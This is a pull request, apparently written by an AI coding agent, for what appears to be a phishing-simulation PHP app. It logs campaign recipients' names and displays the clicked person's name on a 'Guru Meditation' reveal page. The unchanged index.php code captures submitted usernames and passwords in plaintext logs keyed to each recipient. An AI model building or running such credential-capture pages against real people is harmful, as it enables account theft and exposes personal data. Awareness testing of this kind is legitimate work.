### PR TITLE
Show clicked user's name in guru page

### DIFF
--- a/admin.php
+++ b/admin.php
@@ -43,8 +43,15 @@ if (isset($_GET['send'])) {
         $mail->Subject = $camp['name'];
         $mail->Body = $body;
         if($mail->send()){
-            $event = ['event'=>'sent','email'=>$data['email'],'hash'=>$hash,'time'=>time()];
-            file_put_contents($logFile,json_encode($event)."\n",FILE_APPEND);
+            $event = [
+                'event' => 'sent',
+                'email' => $data['email'],
+                'first' => $data['vorname'],
+                'last'  => $data['nachname'],
+                'hash'  => $hash,
+                'time'  => time()
+            ];
+            file_put_contents($logFile, json_encode($event) . "\n", FILE_APPEND);
         }
         sleep(10);
     }

--- a/guru.php
+++ b/guru.php
@@ -1,4 +1,39 @@
 <?php
+function findLogFile($hash){
+    foreach(glob(__DIR__.'/logs/*.jsonl') as $f){
+        $h = fopen($f, 'r');
+        while(($line = fgets($h)) !== false){
+            $d = json_decode($line, true);
+            if($d && isset($d['hash']) && $d['hash'] === $hash){
+                fclose($h);
+                return $f;
+            }
+        }
+        fclose($h);
+    }
+    return null;
+}
+
+function findName($logFile, $hash){
+    $h = fopen($logFile, 'r');
+    while(($line = fgets($h)) !== false){
+        $d = json_decode($line, true);
+        if($d && isset($d['event']) && $d['event'] === 'sent' && $d['hash'] === $hash){
+            fclose($h);
+            $first = $d['first'] ?? '';
+            $last  = $d['last'] ?? '';
+            return trim($first.' '.$last);
+        }
+    }
+    fclose($h);
+    return '';
+}
+
+$hash = $_GET['id'] ?? '';
+$name = '';
+if($hash && ($logFile = findLogFile($hash))){
+    $name = findName($logFile, $hash);
+}
 $guruCode = sprintf('#%08X.%08X', mt_rand(0, 0xFFFFFFFF), mt_rand(0, 0xFFFFFFFF));
 ?>
 <!DOCTYPE html>
@@ -80,7 +115,15 @@ $guruCode = sprintf('#%08X.%08X', mt_rand(0, 0xFFFFFFFF), mt_rand(0, 0xFFFFFFFF)
     <div class="line">Software Failure. Press left mouse button to continue.</div>
     <div class="line">Guru Meditation <?= $guruCode ?></div>
   </div>
-  <div class="hero-name">Ralf<br>Malz</div>
+  <div class="hero-name">
+    <?php
+      if($name){
+          echo nl2br(htmlspecialchars($name));
+      } else {
+          echo 'Ralf<br>Malz';
+      }
+    ?>
+  </div>
   <div class="eyes">
     <img src="n.gif" alt="Ninja Eyes">
   </div>

--- a/index.php
+++ b/index.php
@@ -20,7 +20,7 @@ if($hash && $logFile){
 if($_SERVER['REQUEST_METHOD']=='POST' && $hash && $logFile){
     $event=['event'=>'submitted','hash'=>$hash,'time'=>time(),'user'=>$_POST['user']??'','pass'=>$_POST['pass']??''];
     file_put_contents($logFile,json_encode($event)."\n",FILE_APPEND);
-    header('Location: guru.php');
+    header('Location: guru.php?id=' . urlencode($hash));
     exit;
 }
 ?>


### PR DESCRIPTION
## Summary
- log recipient names when sending emails
- pass the link ID through to `guru.php`
- fetch the name from logs and display it on the guru page

## Testing
- `php -l admin.php`
- `php -l index.php`
- `php -l guru.php`


------
https://chatgpt.com/codex/tasks/task_e_687a90f463f483279fce0d688e099732